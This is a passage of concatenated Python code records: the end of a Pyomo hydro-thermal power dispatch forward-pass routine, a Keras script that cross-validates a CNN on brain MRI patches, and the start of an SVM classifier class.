variables\n from utils.saveresults import saveiter\n from utils import solver\n import progressbar\n import pickle\n\n # Cost-to-go function\n if fcf_Operator is True:\n dict_fcf = pickle.load(open(\"savedata/fcfdataIter.p\", \"rb\"))\n else:\n dict_fcf = pickle.load(open(\"savedata/fcfdata.p\", \"rb\"))\n fcf_backward = dict_fcf['fcf_backward']\n \n # progress analysis\n bar = progressbar.ProgressBar(max_value = Param.seriesForw*Param.stages, \\\n widgets=[progressbar.Bar('=', '[', ']'), ' Forward stage - iteration '+str(iteration+1)+' ', \n progressbar.Percentage()])\n bar.start(); count = 0\n \n # import data\n dict_hydro = pickle.load(open(\"savedata/hydro_save.p\", \"rb\"))\n dh_factor = dict_hydro['prodFactor']\n dh_limits = dict_hydro['u_limit']\n dict_batt = pickle.load(open(\"savedata/batt_save.p\", \"rb\"))\n dict_lines = pickle.load(open(\"savedata/lines_save.p\", \"rb\"))\n dict_windenergy = pickle.load(open(\"savedata/windspeed_save.p\", \"rb\"))\n dict_wind = pickle.load(open(\"savedata/wind_hat_0.p\", \"rb\"))\n dict_format = pickle.load(open(\"savedata/format_save.p\", \"rb\"))\n df_demand = dict_format['demand']\n df_thmin = dict_format['thermalMin']\n df_thmax = dict_format['thermalMax']\n df_opcost = dict_format['opCost']\n dict_data = pickle.load(open(\"savedata/data_save_iter.p\", \"rb\"))\n dd_rationing = dict_data['rationingData']\n dd_emissions = dict_data['emissionsData']\n b_storageData = dict_data['b_storageData']\n\n # data from dictionaries\n numAreas = dict_data['numAreas']\n numBlocks = dict_format['numBlocks']\n blocksData = dict_data['blocksData']\n thermalPlants = dict_data['thermalPlants']\n smallData = dict_data['smallData']\n smallPlants = dict_data['smallPlants']\n batteries = dict_data['batteries']\n hydroPlants = dict_data['hydroPlants']\n volData = dict_data['volData']\n thermalData = dict_data['thermalData']\n demandArea = dict_format['demandArea']\n rnwArea = dict_windenergy['RnwArea']\n \n circuits = dict_data['linesData']\n fcircuits = list(range(1, len(circuits)+1))\n\n # print results\n lenblk = range(numBlocks)\n lenstg = range(Param.stages); lensc = range(Param.seriesForw)\n\n genThermal = [[[[[] for bl in lenblk] for z in thermalPlants] for x in lenstg] for y in lensc]\n genSmall = [[[[[] for bl in lenblk] for z in smallPlants] for x in lenstg] for y in lensc]\n genHydro = [[[[[] for bl in lenblk] for z in hydroPlants] for x in lenstg] for y in lensc]\n genwind = [[[[[] for bl in lenblk] for z in range(numAreas)] for x in lenstg] for y in lensc]\n spillwind = [[[[[] for bl in lenblk] for z in range(numAreas)] for x in lenstg] for y in lensc]\n genBatteries = [[[[[] for bl in lenblk] for z in batteries] for x in lenstg] for y in lensc]\n genDeficit = [[[[[] for bl in lenblk] for x in lenstg] for y in lensc] for x in range(numAreas)]\n emissCurve = [[[[] for bl in lenblk] for x in lenstg] for y in lensc]\n loadBatteries = [[[[[] for bl in lenblk] for z in batteries] for x in lenstg] for y in lensc]\n lvlBatteries = [[[[] for z in batteries] for x in lenstg] for y in lensc]\n lvlHydro = [[[[] for z in hydroPlants] for x in lenstg] for y in lensc]\n spillHydro = [[[[[] for bl in lenblk] for z in hydroPlants] for x in lenstg] for y in lensc]\n linTransfer = [[[[[] for a in range(numAreas)] for z in range(numAreas)] for x in lenstg] for y in lensc]\n genRnws = [[[[[] for bl in lenblk] for z in range(numAreas)] for x in lenstg] for y in lensc]\n \n # Define solver\n opt = solver.gurobi_solver(SolverFactory)\n #opt = 
solver.glpk_solver(SolverFactory)\n #opt = solver.cplex_solver(SolverFactory)\n #opt = solver.ipopt_solver(SolverFactory)\n #opt = solver.cbc_solver(SolverFactory)\n #opt = solver.xpress_solver(SolverFactory)\n \n # Define abstract model\n model = pyomo.ConcreteModel()\n\n # SETS\n # set of demand blocks\n model.Blocks = pyomo.Set(initialize=list(range(1, numBlocks+1)))\n # set of state/cut\n model.Cuts = pyomo.Set(initialize= list(range(1, iteration+2)))\n #model.Cuts = pyomo.Set(initialize=[1])\n # set of hydroelectric plants / reservoirs\n model.Hydro = pyomo.Set(initialize=hydroPlants)\n # set of hydro plants with reservoirs\n setData = pyomohydro(hydroPlants, dict_data['hydroReservoir'])\n model.resHydro = pyomo.Set(initialize=setData)\n # generation chains: set of spill and turbining arcs\n setData = pyomoset(dict_hydro['S-downstream'])\n model.SpillArcs = pyomo.Set(initialize= setData, dimen=2)\n setData = pyomoset(dict_hydro['T-downstream'])\n model.TurbiningArcs = pyomo.Set(initialize= setData, dimen=2)\n # set of thermal plants\n model.Thermal = pyomo.Set(initialize=thermalPlants)\n # set of thermal plants\n model.Small = pyomo.Set(initialize=smallPlants)\n # set of wind farms\n model.Wind = pyomo.Set(initialize=dict_data['windPlants'])\n # set of battery units\n model.Batteries = pyomo.Set(initialize=batteries)\n # set of areas in the system\n model.Areas = pyomo.Set(initialize=list(range(1, numAreas+1)))\n model.AreasDmd = pyomo.Set(initialize= demandArea)\n model.AreasRnw = pyomo.Set(initialize= rnwArea)\n # set of lines in the system\n model.Circuits = pyomo.Set(initialize= fcircuits)\n \n # Plants by areas\n def In_init(model, area):\n retval = [];\n for lines_def in range(len(circuits)):\n lines_area = circuits[lines_def][0]\n if lines_area == area:\n retval.append(lines_def+1)\n return retval\n model.linesAreaIn = pyomo.Set(model.Areas, initialize= In_init)\n def Out_init(model, area):\n retval = [];\n for lines_def in range(len(circuits)):\n lines_area = circuits[lines_def][1]\n if lines_area == area:\n retval.append(lines_def+1)\n return retval\n model.linesAreaOut = pyomo.Set(model.Areas, initialize= Out_init)\n \n def thermalArea_init(model, area):\n retval = []\n for i in model.Thermal:\n th_indx = thermalPlants.index(i)\n are_pl = dict_format['area_thermal'][th_indx]\n if are_pl == area:\n retval.append(i)\n return retval\n model.ThermalArea = pyomo.Set(model.Areas, initialize= thermalArea_init)\n \n def hydroArea_init(model, area):\n retval = []\n for i in model.Hydro:\n hy_indx = hydroPlants.index(i)\n are_pl = dict_format['area_hydro'][hy_indx]\n if are_pl == area:\n retval.append(i)\n return retval\n model.HydroArea = pyomo.Set(model.Areas, initialize= hydroArea_init)\n \n def smallArea_init(model, area):\n retval = []\n for i in model.Small:\n sm_indx = smallPlants.index(i)\n are_pl = dict_format['area_small'][sm_indx]\n if are_pl == area:\n retval.append(i)\n return retval\n model.SmallArea = pyomo.Set(model.Areas, initialize= smallArea_init)\n \n # PARAMETERS\n # cost of thermal production\n model.cost = pyomo.Param(model.Thermal, mutable=True)\n # cost of energy rationing\n model.rationing = pyomo.Param(model.Areas, mutable=True)\n # demand for each stage\n model.demand = pyomo.Param(model.Areas, model.Blocks, mutable=True)\n # inflows for each stage\n model.inflows = pyomo.Param(model.Hydro, mutable=True)\n # wind inflows for each stage\n model.meanWind = pyomo.Param(model.Areas, model.Blocks, mutable=True)\n # production factor for each hydro plant\n 
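#(declared mutable so the value can be updated stage by stage in the forward loop)\n 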
model.factorH = pyomo.Param(model.Hydro, mutable=True)\n # Hydro plants by area\n # production cost (CxC) for each hydro plant\n dictplant = {hydroPlants[z]: dict_hydro['oymcost'][z] for z in range(len(hydroPlants))}\n model.hydroCost = pyomo.Param(model.Hydro, initialize=dictplant)\n # production factor for each battery unit\n model.factorB = pyomo.Param(model.Batteries, mutable=True)\n # Batteries by area\n dictplant = {batteries[z]: dict_batt['b_area'][z] for z in range(len(batteries))}\n model.BatteriesArea = pyomo.Param(model.Batteries, initialize=dictplant)\n # coeficcient of lineal segments in the future cost function\n model.coefcTerm = pyomo.Param(model.Hydro, model.Cuts, mutable=True)\n # constant term of lineal segments in the future cost function\n model.constTerm = pyomo.Param(model.Cuts, mutable=True)\n # coeficcient of lineal segments in the future cost function\n model.coefcBatt = pyomo.Param(model.Batteries, model.Cuts, mutable=True)\n # Initial volume in reservoirs\n model.iniVol = pyomo.Param(model.Hydro, mutable=True)\n # Initial storage in batteries\n model.iniLvl = pyomo.Param(model.Batteries, mutable=True)\n model.iniLvlBlk = pyomo.Param(model.Batteries, model.Blocks, mutable=True)\n\n # BOUNDS\n # bounds (min and max) on hydro generation\n #model.minGenH = pyomo.Param(model.Hydro, model.Blocks, mutable=True)\n model.maxGenH = pyomo.Param(model.Hydro, model.Blocks, mutable=True)\n # bounds (min and max) on thermal generation\n model.minGenT = pyomo.Param(model.Thermal, model.Blocks, mutable=True)\n model.maxGenT = pyomo.Param(model.Thermal, model.Blocks, mutable=True)\n # bounds (min and max) on thermal generation\n model.minGenS = pyomo.Param(model.Small, model.Blocks, mutable=True)\n model.maxGenS = pyomo.Param(model.Small, model.Blocks, mutable=True)\n # bounds (min and max) on batteries generation\n #model.minGenB = pyomo.Param(model.Batteries, model.Blocks, mutable=True)\n model.maxGenB = pyomo.Param(model.Batteries, model.Blocks, mutable=True)\n # bounds (min and max) on wind area generation\n model.maxGenW = pyomo.Param(model.Areas, model.Blocks, mutable=True)\n # bounds (min and max) on capacity of reservoirs\n dictplant = {hydroPlants[z]: dict_hydro['volmin'][z] for z in range(len(hydroPlants))}\n model.minVolH = pyomo.Param(model.Hydro, initialize=dictplant)\n dictplant = {hydroPlants[z]: dict_hydro['volmax'][z] for z in range(len(hydroPlants))}\n model.maxVolH = pyomo.Param(model.Hydro, initialize=dictplant)\n # bounds (min and max) on capacity of batteries\n model.maxlvl = pyomo.Param(model.Batteries, mutable=True)\n model.maxlvlB = pyomo.Param(model.Batteries, mutable=True)\n # bounds (max) on capacity of lines\n model.lineLimit = pyomo.Param(model.Circuits, model.Blocks, mutable=True)\n \n ###########################################################################\n \n # Bounds and DECISION VARIABLES\n variables(model, pyomo)\n \n ###########################################################################\n \n # conditional constraints\n \n if Param.dist_free is True:\n \n dict_pleps = pickle.load(open(\"savedata/pleps_save.p\", \"rb\"))\n residual = dict_pleps['p_points']\n \n numPleps = dict_pleps['plepcount']\n model.plepNum = pyomo.Set(initialize= list(range(1, numPleps+1)))\n \n # coeficient pleps variables\n model.factorPlep = pyomo.Var(model.Areas, model.Blocks, model.plepNum, domain=pyomo.NonNegativeReals)\n # aggregated renewables production\n model.RnwLoad = pyomo.Var(model.Areas, model.Blocks)\n \n # p_efficient points\n model.plep = 
pyomo.Param(model.Areas, model.Blocks, model.plepNum, mutable=True)\n \n if Param.param_opf is True:\n dict_intensity = pickle.load(open(\"savedata/matrixbeta_save.p\", \"rb\"))\n \n # generation chains: set of spill and turbining arcs\n setData = pyomoset(dict_intensity['matrixLineBus'][0])\n model.linebus = pyomo.Set(initialize= setData, dimen=2)\n \n # lines intensities OPF\n model.flines = pyomo.Param(model.Circuits, model.Areas, mutable=True)\n \n # flowgates parameters\n if Param.flow_gates is True:\n \n numGates = dict_format['numGates']\n gatesets = dict_lines['gatesets']\n gateslimit = dict_lines['gateslimit']\n \n # set of gates flow in the system\n model.Gates = pyomo.Set(initialize= list(range(1, numGates+1)))\n \n # flow gates set\n setData = pyomogates(gatesets)\n model.gateLines = pyomo.Set(initialize=setData, dimen=3)\n \n # defining limit of gate flows\n model.gateLimt = pyomo.Param(model.Gates, model.Blocks, mutable=True)\n \n # emissions consideration\n if Param.emissions is True:\n \n # emission factor for each hydro plant\n dictplant = {hydroPlants[z]: volData[15][z] for z in range(len(hydroPlants))}\n model.hydroFE = pyomo.Param(model.Hydro, initialize=dictplant)\n # emission factor for each thermal plant\n dictplant = {thermalPlants[z]: (Param.thermal_co2[0]*thermalData[13][z])+\n (Param.thermal_co2[1]*thermalData[12][z]*thermalData[11][z]) for z in range(len(thermalPlants))}\n model.thermalFE = pyomo.Param(model.Thermal, initialize=dictplant)\n # emission factor for each small plant\n dictplant = {smallPlants[z]: smallData[8][z] for z in range(len(smallPlants))}\n model.smallFE = pyomo.Param(model.Small, initialize=dictplant)\n # cost of CO2 emissions\n model.co2cost = pyomo.Param(mutable=True)\n \n ################### Optimization model ####################################\n \n # OBJ FUNCTION\n obj_function(Param, model, pyomo)\n \n # CONSTRAINTS\n # define constraint: demand must be served in each block and stage\n load_balance(Param, model, pyomo)\n \n # define constraint: energy conservation\n energy_conservation(Param, model, pyomo)\n\n # define constraint: Wind production conservation\n storage_function(Param, model, pyomo)\n\n # define constraint: future cost funtion\n costtogo(Param, model, pyomo)\n\n # Creating instance\n model.dual = Suffix(direction=Suffix.IMPORT)\n\n ################ Forward analysis #############################\n\n sol_cost_scn = [[],[],[]] # Save operation csot and cost-to-go value\n\n # Save results\n sol_vol_iter = [[0 for x in hydroPlants] for x in lenstg] # Hydro iteration\n sol_lvl_batt = [[0 for x in batteries] for x in lenstg] # Batteries iteration\n\n # Save new state for the current iteration\n sol_scn = [[] for x in lensc] # Hydro iteration\n marg_costs = [[[] for x in lenstg] for x in lensc] # Hydro iteration\n\n # Create a model instance and optimize\n for k in lensc: # Iteration by scenarios\n\n # Update the initial volume at each stage\n for i, plant in enumerate(hydroPlants): \n model.iniVol[plant] = dict_data['volData'][0][i]\n for i, plant in enumerate(batteries): \n model.iniLvl[plant] = dict_data['battData'][0][i]*dict_batt[\"b_storage\"][i][0][0]\n for y in lenblk:\n model.iniLvlBlk[plant, y+1] = dict_data['battData'][0][i]*dict_batt[\"b_storage\"][i][0][0]/numBlocks\n\n sol_cost = [[],[],[]] # Save operation cost and cost-to-go value\n\n for s in lenstg: # Iteration by stages\n\n for z in range(len(circuits)):\n for y in lenblk:\n model.lineLimit[z+1, y+1] = 
dict_lines['l_limits'][s][circuits[z][0]-1][circuits[z][1]-1]*blocksData[0][y]\n \n # opf matriz restrictions\n if Param.param_opf is True:\n for z in range(len(circuits)):\n for area1 in range(numAreas):\n model.flines[z+1,area1+1]= dict_intensity['matrixbeta'][s][z][area1]\n # flowgates constraints\n if Param.flow_gates is True:\n for gate1 in range(numGates):\n for y in lenblk:\n model.gateLimt[gate1+1, y+1] = gateslimit[gate1][s]*blocksData[0][y]\n\n InflowsHydro = []\n InflowsHydro += [dict_format['inflow_hydro'][n][1][s][k] for n in range(len(hydroPlants))]\n\n for z, plant in enumerate(hydroPlants):\n model.factorH[plant] = dh_factor[z][s]\n model.inflows[plant] = InflowsHydro[z]\n for y in lenblk:\n model.maxGenH[plant, y+1] = dh_limits[z][s]*blocksData[0][y]\n \n if Param.emissions is True:\n model.co2cost = dd_emissions[0][s]\n \n for y in range(numAreas):\n model.rationing[y+1] = dd_rationing[y][s]\n \n \n if Param.dist_free is True:\n # update rationing cost and demand values by stage\n for area1 in range(numAreas):\n for y in lenblk:\n for plp in range(numPleps):\n model.plep[area1+1, y+1, plp+1] = residual[s][k][area1][y][plp]\n else:\n # wind energy\n for z in lenblk:\n for y in range(numAreas):\n model.meanWind[y+1,z+1] = dict_windenergy['windenergy_area'][y][s][k][z]\n\n for z in lenblk:\n for y in range(numAreas):\n model.demand[y+1,z+1] = df_demand[y][s][z]\n model.maxGenW[y+1,z+1] = dict_wind['hat_area'][y][s]*blocksData[0][z]\n \n # Update the generation cost\n for i, plant in enumerate(thermalPlants):\n model.cost[plant] = df_opcost[i][s]\n for y in lenblk:\n model.minGenT[plant, y+1] = df_thmin[s][i]*blocksData[0][y]\n model.maxGenT[plant, y+1] = df_thmax[s][i]*blocksData[0][y]\n\n # Update small plants limits\n for i, plant in enumerate(smallPlants):\n for y in lenblk:\n model.minGenS[plant, y+1] = 0\n model.maxGenS[plant, y+1] = dict_format['smallMax'][s][i]*blocksData[0][y]\n\n # Update batteries limits\n for i, plant in enumerate(batteries):\n model.maxlvl[plant] = dict_batt[\"b_storage\"][i][s][1]\n model.maxlvlB[plant] = dict_batt[\"b_storage\"][i][s][0]*blocksData[0][y]*b_storageData[i][y]\n model.factorB[plant] = dict_data['battData'][4][i]\n for y in lenblk:\n model.maxGenB[plant, y+1] = dict_batt['b_limit'][i][s]*blocksData[0][y]*b_storageData[i][y] # restrictions\n\n # Update the cost-to-go function\n #model.Cuts.clear()\n for z in range(iteration+1): # len(fcf_backward[s+1])):\n #model.Cuts.add(z+1)\n if s+1 == Param.stages:\n model.constTerm[z+1] = fcf_backward[s+1][0][2]\n for y, plant in enumerate(batteries):\n model.coefcBatt[plant, z+1] = fcf_backward[s+1][0][1][y]\n for y, plant in enumerate(hydroPlants):\n model.coefcTerm[plant, z+1] = fcf_backward[s+1][0][0][y]\n else:\n model.constTerm[z+1] = fcf_backward[s+1][z][2]\n for y, plant in enumerate(batteries):\n model.coefcBatt[plant, z+1] = fcf_backward[s+1][z][1][y]\n for y, plant in enumerate(hydroPlants):\n model.coefcTerm[plant, z+1] = fcf_backward[s+1][z][0][y]\n #model.ctFcf.reconstruct()\n\n # solver\n opt.solve(model)#, symbolic_solver_labels=False) #, tee=True)\n #with open('pyomo_model.txt', 'w') as f:\n # model.pprint(ostream=f)\n # instance.display()\n\n # objective function value\n sol_objective = model.OBJ(); costtogo = model.futureCost()\n sol_cost[0].append(sol_objective-costtogo); sol_cost[1].append(sol_objective)\n sol_scn[k].append(sol_objective-costtogo)\n #print(sol_objective)\n\n vol_f_stage = [] # Save results of initial volume - v_t+1\n for vol_fin in [model.vol]:\n varobject 
= getattr(model, str(vol_fin))\n vol_f_stage += [varobject[i].value for i in hydroPlants]\n\n lvl_f_stage = [] # Save results of initial level - l_t+1\n for lvl_fin in [model.lvl]:\n varobject = getattr(model, str(lvl_fin))\n lvl_f_stage += [varobject[i].value for i in batteries]\n\n # Svael volt_t+1 for the next backward iteration\n sol_vol_iter[s] = [sum(x) for x in zip(sol_vol_iter[s], vol_f_stage)]\n sol_lvl_batt[s] = [sum(x) for x in zip(sol_lvl_batt[s], lvl_f_stage )]\n\n # Update the initial volume at each stage\n for i, plant in enumerate(hydroPlants):\n model.iniVol[plant] = vol_f_stage[i]\n for i, plant in enumerate(batteries): \n model.iniLvl[plant] = lvl_f_stage[i]\n for y in lenblk:\n model.iniLvlBlk[plant,y+1] = lvl_f_stage[i]/numBlocks\n\n # marginal cost of each area\n if (iteration + 1 == Param.max_iter or confidence == 1):\n duals_dmd = [[[] for x in lenblk] for y in range(numAreas)]\n d_object = getattr(model, 'ctDemand')\n for areadem in range(numAreas):\n for i in lenblk:\n duals_dmd[areadem][i].append(model.dual[d_object[areadem+1,i+1]])\n marg_costs[k][s] = duals_dmd\n\n # RESULTS\n if ((iteration + 1 == Param.max_iter or confidence == 1) and Param.results is True):\n\n (genThermal,genHydro,genBatteries,genDeficit,loadBatteries,lvlBatteries,\n lvlHydro,linTransfer,spillHydro,genwind,spillwind,genSmall,emsscurve,genRnws) = saveiter(k,\n s,lenblk,thermalPlants,model,genThermal,hydroPlants,batteries,genHydro,\n genBatteries,loadBatteries,lvlBatteries,lvlHydro,genDeficit,linTransfer,\n circuits,spillHydro,genwind,spillwind,genSmall,smallPlants,rnwArea,Param,\n emissCurve,genRnws)\n\n # progress of the analysis\n bar.update(count+1)\n count += 1\n\n # Operation costs by scenarios\n sol_cost_scn[0].append(sum(sol_cost[0]))\n sol_cost_scn[1].append(sol_cost[1][0])\n sol_cost_scn[2].append(sum(sol_cost[0][:(Param.stages-Param.bnd_stages)]))\n\n# for s in lenstg:\n# # save the last solutions\n# last_sol = [x/dataParam.sf for x in sol_vol_iter[s]]\n# last_batt = [x/dataParam.sf for x in sol_lvl_batt[s]]\n# if last_sol not in sol_vol[s+1] or last_batt not in sol_lvl[s+1]:\n# sol_vol[s+1].append([x/dataParam.sf for x in sol_vol_iter[s]])\n# sol_lvl[s+1].append([x/dataParam.sf for x in sol_lvl_batt[s]])\n\n # Export results\n if ((iteration + 1 == Param.max_iter or confidence == 1) and Param.results is True):\n\n # export data\n DataDictionary = { \"genThermal\":genThermal,\"genHydro\":genHydro,\"genSmall\":genSmall,\n \"genBatteries\":genBatteries,\"genDeficit\":genDeficit,\"loadBatteries\":loadBatteries,\n \"lvlBatteries\":lvlBatteries,\"lvlHydro\":lvlHydro,\"linTransfer\":linTransfer,\n \"spillHydro\":spillHydro,\"genwind\":genwind,\"spillwind\":spillwind,\"marg_costs\":marg_costs,\n \"emsscurve\":emsscurve,\"genRnws\":genRnws}\n\n pickle.dump(DataDictionary, open( \"savedata/results_save.p\", \"wb\" ) )\n\n return (sol_vol_iter, sol_lvl_batt, sol_cost_scn, sol_scn)\n\n","sub_path":"scripts/forward2.py","file_name":"forward2.py","file_ext":"py","file_size_in_byte":24066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"483132953","text":"from __future__ import print_function\n\nfrom keras.datasets import mnist\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\n\nimport numpy as np\nfrom keras.utils.np_utils import to_categorical\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.optimizers import SGD\n\nfrom keras.models import 
load_model\n\n\nfrom keras.datasets import mnist\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D, Convolution3D, MaxPooling3D\nfrom keras.layers import Merge\nfrom keras.utils import np_utils\n\nfrom keras.models import model_from_json\nfrom keras import backend as K\n\n\nimport random as rdm\nimport nibabel as nib\nimport image_manager as imm\nimport gc\n\nimport tensorflow as tf\nimport json\n\n#############################################\n\nmodel_name\t= \"paralel_v1_2D\"\n\n#### default: takes 3 imag types -> less context so as the input size of \n ### the NN is equal, and the comparison is fair\n\n\nbatch_size = 128\nnb_classes = 2\nnb_epoch = 30\n# input image dimensions\ninp_dim_2d = 33\ninp_dim_3d = 65\nstep = 8\n\n# number of convolutional filters to use\nnb_filters = 45 ### lets change it manually, increasing it \n# size of pooling area for max pooling\npool_size_2d = (2, 2)\n# convolution kernel size\nkernel_size_2d = (3, 3)\n\n\n# exp1\nimg_types = [\"flair\",\"FA\",\"anatomica\"]\n\n\n\n# prepare input for the \ninput_shape_2d = (inp_dim_2d, inp_dim_2d, len(img_types))\ninput_shape_3d = (inp_dim_3d, inp_dim_3d, len(img_types))\n\n\n\n\n\n\n## paralel NN, y\nmodel_y = Sequential()\n\n\nmodel_y.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1],\n border_mode='valid',\n input_shape=input_shape_2d))\nmodel_y.add(Activation('relu'))\n\nmodel_y.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_y.add(Activation('relu'))\n\nmodel_y.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_y.add(Dropout(0.25))\n\nmodel_y.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_y.add(Activation('relu'))\n\nmodel_y.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_y.add(Dropout(0.25))\n\nmodel_y.add(Flatten())\n\n\n## paralel NN, z\nmodel_z = Sequential()\n\nmodel_z.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1],\n border_mode='valid',\n input_shape=input_shape_3d))\nmodel_z.add(Activation('relu'))\n\nmodel_z.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_z.add(Activation('relu'))\n\nmodel_z.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_z.add(Dropout(0.25))\n\nmodel_z.add(Convolution2D(nb_filters, kernel_size_2d[0], kernel_size_2d[1]))\nmodel_z.add(Activation('relu'))\n\nmodel_z.add(MaxPooling2D(pool_size=pool_size_2d))\n#model_z.add(Dropout(0.25))\n\nmodel_z.add(Flatten())\n\n\n\nmerged = Merge([model_y, model_z], mode='concat')\nfinal_model = Sequential()\n\nfinal_model.add(merged)\n# print(\"Output shape after merge:\", final_model.output_shape)\n# final_model.add(Dense(1024))\n# final_model.add(Activation('relu'))\n# final_model.add(Dropout(0.5))\nprint(\"Output shape after fully connected(dropout0.5):\", final_model.output_shape)\nfinal_model.add(Dense(128))\nfinal_model.add(Activation('relu'))\nfinal_model.add(Dropout(0.5))\nprint(\"Output shape after dully connected(dropout0.5):\", final_model.output_shape)\nfinal_model.add(Dense(nb_classes))\nfinal_model.add(Activation('softmax'))\nprint(\"Output shape after softmax (2 classes):\", final_model.output_shape)\n\n#train_data partition\nbrains = [\"tka002\",\"tka003\",\"tka004\",\"tka005\",\"tka006\",\"tka007\",\"tka009\",\"tka010\",\"tka011\",\"tka012\",\"tka013\",\"tka015\",\"tka016\",\"tka017\",\"tka018\",\"tka019\",\"tka020\",\"tka021\"]\n\n#balance proportion\nbal_train = 10\nbal_test = 200\n\ntr = imm.ImageManager() # load training data\nres = []\ndef 
evaluate(model,X_test,y_test):\n\ty_pred = model.predict(X_test)\n\tmat = [[0,0],[0,0]] # [[TP,FP],[FN,TN]]\n\tfor i in range(len(y_pred)):\n\t\tif y_test[i][1] == 0: # real negative\n\t\t\tmat[1][1] += y_pred[i][0] #TN\n\t\t\tmat[0][1] += y_pred[i][1] #FP\n\t\telse:\n\t\t\tmat[1][0] += y_pred[i][0] #FN\n\t\t\tmat[0][0] += y_pred[i][1] #TP\n\n\t# mat[0][0] /= len(y_pred)\n\t# mat[0][1] /= len(y_pred)\n\t# mat[1][0] /= len(y_pred)\n\t# mat[1][1] /= len(y_pred)\n\n\tTPR = mat[0][0] / (mat[0][0] + mat[1][0])\n\tTNR = mat[1][1] / (mat[1][1] + mat[0][1])\n\treturn(mat,TPR,TNR)\t\n\nfor i in range(len(brains)//4):\n\tfor it in range(1):\n\t\ttrain_brain = brains[:i*4]+brains[(i+1)*4:]\n\t\ttest_brain = brains[i*4:(i+1)*4]\n\n\t\t## load training data\n\t\ttr.reset()\n\t\ttr.init(train_brain)\n\t\ttr.createSlices(step=step)\n\t\ttr.balance(bal_train)\n\t\ttr.split(1) # we will select the whole brain\n\n\t\tX_train_y = tr.getData(img_types, \"2dy\", inp_dim_2d)[0]\n\t\ty_train = X_train_y[1]\n\t\tX_train_y = X_train_y[0]\n\n\t\tX_train_z = tr.getData(img_types, \"2dy\", inp_dim_3d)[0][0]\n\n\n\n\n\t\tfinal_model.compile(loss='binary_crossentropy',\n\t\t optimizer='adadelta',\n\t\t metrics=['accuracy'])\n\n\t\tcv = final_model.fit([X_train_y, X_train_z], y_train, batch_size=batch_size, validation_split=0.1, nb_epoch=nb_epoch,verbose=2)\n\t\tfinal_model.save(\"../models/model_\" + model_name +\"_\"+ str(i) + \".mdl\")\n\n\t\twith open(\"hist_\"+model_name+\"_\"+str(i)+\".json\",\"w\") as hist_file: # renamed from 'tf' so the tensorflow import is not shadowed\n\t\t\thist_file.write(json.dumps(cv.history))\n\n\t\t#model = load_model(\"../models/model_0.mdl\")\n\t\ttr.reset()\n\t\t### test stuff\n\n\t\ttt = imm.ImageManager() # load test data\n\t\ttt.init(test_brain)\n\t\ttt.createSlices(step=step+1)\n\t\ttt.balance(bal_test)\n\t\ttt.split(1) # we will select the whole brain\n\n\t\tX_test_y = tt.getData(img_types, \"2dy\", inp_dim_2d)[0]\n\t\ty_test = X_test_y[1]\n\t\tX_test_y = X_test_y[0]\n\n\t\tX_test_z = tt.getData(img_types, \"2dy\", inp_dim_3d)[0][0]\t\n\n\t\tscore = evaluate(final_model,[X_test_y, X_test_z],y_test)\n\t\tres.append((score,train_brain, test_brain))\n\t\tprint(\"###########################################\")\n\t\tprint(\"Cross Validation:\",i, \"\\tIteration:\",it)\n\t\tprint(\"balance:\", bal_test, \"(\", y_test.shape[0], \")\")\n\t\tprint(score[0][0])\n\t\tprint(score[0][1])\n\t\tprint(\"TPR:\", score[1])\n\t\tprint(\"TNR:\", score[2])\n\t\ttt.reset()\n\tprint(\"\")\n\tprint(\"########################################\")\n\tprint(\"### Total (Average) cv: \"+str(i)+\" ###\")\n\tprint(\"########################################\")\n\tTP = 0\n\tTN = 0\n\tFP = 0\n\tFN = 0\n\tfor el in res[i*1:(i*1)+1]:\n\t\tTP += el[0][0][0][0]\n\t\tTN += el[0][0][1][1]\n\t\tFP += el[0][0][0][1]\n\t\tFN += el[0][0][1][0]\n\ttotal = TP+TN+FP+FN\n\tTP = TP / float(total)\n\tTN = TN / float(total)\n\tFP = FP / float(total)\n\tFN = FN / float(total)\n\tprint([TP,FP], [\"TP\",\"FP\"])\n\tprint([FN,TN], [\"FN\",\"TN\"])\n\tprint(\"\")\n\tprint(\"Accuracy:\", TP+TN)\n\tprint(\"TPR:\", TP / float(TP + FN))\n\tprint(\"TNR:\", TN / float(TN + FP))\n\n\nprint(\"\")\nprint(\"########################################\")\nprint(\"### Total (Average) ###\")\nprint(\"########################################\")\nTP = 0\nTN = 0\nFP = 0\nFN = 0\nfor el in res:\n\tTP += el[0][0][0][0]\n\tTN += el[0][0][1][1]\n\tFP += el[0][0][0][1]\n\tFN += el[0][0][1][0]\ntotal = TP+TN+FP+FN\nTP = TP / float(total)\nTN = TN / float(total)\nFP = FP / float(total)\nFN = FN / float(total)\nprint([TP,FP], 
[\"TP\",\"FP\"])\nprint([FN,TN], [\"FN\",\"TN\"])\nprint(\"\")\nprint(\"Accuracy:\", TP+TN)\nprint(\"TPR:\", TP / float(TP + FN))\nprint(\"TNR:\", TN / float(TN + FP))\n\n\n\n","sub_path":"src/dnn_1_2d.py","file_name":"dnn_1_2d.py","file_ext":"py","file_size_in_byte":7226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"469552824","text":"from classifier import classifier\nfrom numpy import *\n\n\nclass SVM(classifier):\n def __init__(self, c=1.0, tolerance=0.0001, max_iter=10000):\n self.X = None # X observations (nxp matrix)\n self.Y = None # labels\n self.m = None # max number of rows/observations in X\n self.n = None\n self.w = None\n self.alphas = None # support vectors\n self.eCache = None # first column is valid flag TODO: ???\n self.b = 0\n self.C = c # budget for amount that the margin can be violated\n self.tol = tolerance # tolerance for stopping criteria?\n self.max_iter = max_iter\n\n def fit(self, x, y):\n self.X = mat(x)\n self.Y = mat(y).transpose()\n self.m = shape(x)[0]\n self.m, n = shape(self.X)\n self.w = zeros((n, 1))\n self.alphas = mat(zeros((self.m, 